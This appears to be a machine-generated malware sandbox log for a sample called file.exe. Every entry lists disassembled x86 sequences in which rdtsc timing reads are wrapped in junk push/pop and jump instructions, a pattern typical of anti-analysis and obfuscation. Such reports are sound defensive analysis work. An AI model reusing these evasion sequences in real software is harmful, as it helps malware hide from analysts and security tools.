Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141B01D second address: 141B023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141B023 second address: 141B03A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1D94F81633h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141B03A second address: 141B040 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141B040 second address: 141B054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F1D94F81626h 0x0000000e jbe 00007F1D94F81626h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141D76B second address: 141D7AF instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1D94C8C5B8h 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 jmp 00007F1D94C8C5C4h 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F1D94C8C5BAh 0x0000001e jmp 00007F1D94C8C5C0h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141D7AF second address: 141D7C4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1D94F81626h 0x00000008 jmp 00007F1D94F8162Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1424481 second address: 14244C2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F1D94C8C5C9h 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F1D94C8C5BFh 0x00000014 jmp 00007F1D94C8C5BFh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14244C2 second address: 14244CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F1D94F81626h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14244CD second address: 14244D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F1D94C8C5B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1423331 second address: 1423336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1423336 second address: 142333D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D0187 second address: 13D01DE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1D94F81632h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f jmp 00007F1D94F81634h 0x00000014 mov ebx, dword ptr [ebp+124932F2h] 0x0000001a mov edi, 312322A0h 0x0000001f add eax, ebx 0x00000021 adc di, 4E6Ch 0x00000026 nop 0x00000027 jbe 00007F1D94F8162Eh 0x0000002d jne 00007F1D94F81628h 0x00000033 push eax 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 push ecx 0x00000038 pop ecx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D01DE second address: 13D01E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D01E7 second address: 13D0246 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007F1D94F81628h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 00000019h 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 movzx ecx, di 0x00000024 push 00000004h 0x00000026 push 00000000h 0x00000028 push esi 0x00000029 call 00007F1D94F81628h 0x0000002e pop esi 0x0000002f mov dword ptr [esp+04h], esi 0x00000033 add dword ptr [esp+04h], 00000018h 0x0000003b inc esi 0x0000003c push esi 0x0000003d ret 0x0000003e pop esi 0x0000003f ret 0x00000040 movzx ecx, dx 0x00000043 nop 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F1D94F8162Ch 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 142377D second address: 1423788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1423788 second address: 142378C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1429335 second address: 1429358 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1D94C8C5C6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1429358 second address: 142935C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 142935C second address: 1429371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F1D94C8C5BDh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1429371 second address: 142938D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F1D94F81626h 0x00000009 jmp 00007F1D94F8162Dh 0x0000000e popad 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1428615 second address: 1428621 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1428621 second address: 142862D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007F1D94F81626h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14288D0 second address: 14288D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14288D4 second address: 14288F6 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1D94F81626h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1D94F81630h 0x00000011 jbe 00007F1D94F81626h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1428BBA second address: 1428BC4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F1D94C8C5B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1428BC4 second address: 1428BD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F1D94F8162Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1428D21 second address: 1428D28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1428D28 second address: 1428D3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007F1D94F81626h 0x0000000c popad 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 142C4EF second address: 142C4F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 142C4F3 second address: 142C4F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 142C4F7 second address: 142C4FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 142C4FD second address: 142C538 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jp 00007F1D94F81626h 0x0000000b jng 00007F1D94F81626h 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 je 00007F1D94F81628h 0x0000001e push esi 0x0000001f pop esi 0x00000020 push eax 0x00000021 push edx 0x00000022 jnp 00007F1D94F81626h 0x00000028 jmp 00007F1D94F81633h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 142C538 second address: 142C53C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 142C53C second address: 142C544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 142BBA7 second address: 142BBB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop ebx 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 142C1BC second address: 142C203 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1D94F8162Fh 0x00000007 jmp 00007F1D94F8162Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 jmp 00007F1D94F8162Bh 0x00000017 jmp 00007F1D94F81633h 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push esi 0x00000020 pop esi 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 142C203 second address: 142C207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 142C207 second address: 142C20F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1431C8F second address: 1431C95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1431C95 second address: 1431CA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F1D94F81626h 0x0000000d jp 00007F1D94F81626h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1431CA8 second address: 1431CAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1431CAE second address: 1431CC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1D94F8162Bh 0x00000008 ja 00007F1D94F81626h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1431CC7 second address: 1431CDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1D94C8C5C3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1431CDE second address: 1431CEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1431CEA second address: 1431D03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1D94C8C5BCh 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1431D03 second address: 1431D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1431E43 second address: 1431E7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1D94C8C5BEh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c ja 00007F1D94C8C5DAh 0x00000012 pushad 0x00000013 jmp 00007F1D94C8C5C6h 0x00000018 js 00007F1D94C8C5B6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 143227F second address: 1432284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1432547 second address: 143254B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 143254B second address: 1432559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F1D94F81626h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1433105 second address: 1433121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F1D94C8C5C2h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1433121 second address: 1433126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1433126 second address: 143314D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F1D94C8C5C4h 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F1D94C8C5BBh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 143314D second address: 1433151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14333F3 second address: 14333F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14333F7 second address: 1433403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1433403 second address: 1433413 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1D94C8C5BAh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1438819 second address: 1438822 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1437BE9 second address: 1437BF7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1D94C8C5B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1437BF7 second address: 1437C07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1D94F8162Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1437C07 second address: 1437C0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1437C0D second address: 1437C13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1437D62 second address: 1437D68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1438160 second address: 1438166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1438166 second address: 14381B9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1D94C8C5B6h 0x00000008 jmp 00007F1D94C8C5C5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F1D94C8C5C3h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F1D94C8C5C7h 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e pushad 0x0000001f popad 0x00000020 push edx 0x00000021 pop edx 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14381B9 second address: 14381C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14381C1 second address: 14381C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14381C5 second address: 14381C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14381C9 second address: 14381D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14381D3 second address: 14381D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 143834A second address: 1438358 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1D94C8C5BAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1438358 second address: 1438366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F1D94F81626h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14384E0 second address: 14384F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F1D94C8C5BFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14384F5 second address: 143851A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F1D94F81638h 0x00000008 pop edi 0x00000009 pushad 0x0000000a je 00007F1D94F81626h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 143F79D second address: 143F7A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 144570A second address: 144571C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F1D94F81626h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 144571C second address: 1445732 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1D94C8C5C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1445732 second address: 1445737 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1445737 second address: 144573D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1445D11 second address: 1445D41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F1D94F81635h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jmp 00007F1D94F81632h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1445E75 second address: 1445E82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 js 00007F1D94C8C5B6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1445E82 second address: 1445E88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1445E88 second address: 1445EA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F1D94C8C5C8h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1445EA9 second address: 1445EAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14462D5 second address: 14462DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14462DB second address: 14462E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1446406 second address: 1446443 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1D94C8C5C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b jnp 00007F1D94C8C5B6h 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop esi 0x00000014 jmp 00007F1D94C8C5C8h 0x00000019 push ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1446583 second address: 144659B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1D94F8162Dh 0x00000009 jl 00007F1D94F81626h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 144659B second address: 14465C0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1D94C8C5B8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1D94C8C5C7h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1447432 second address: 144743B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 144743B second address: 144744B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F1D94C8C5B6h 0x00000008 jnc 00007F1D94C8C5B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 144744B second address: 1447473 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1D94F8162Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F1D94F81632h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1447473 second address: 144747D instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1D94C8C5B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
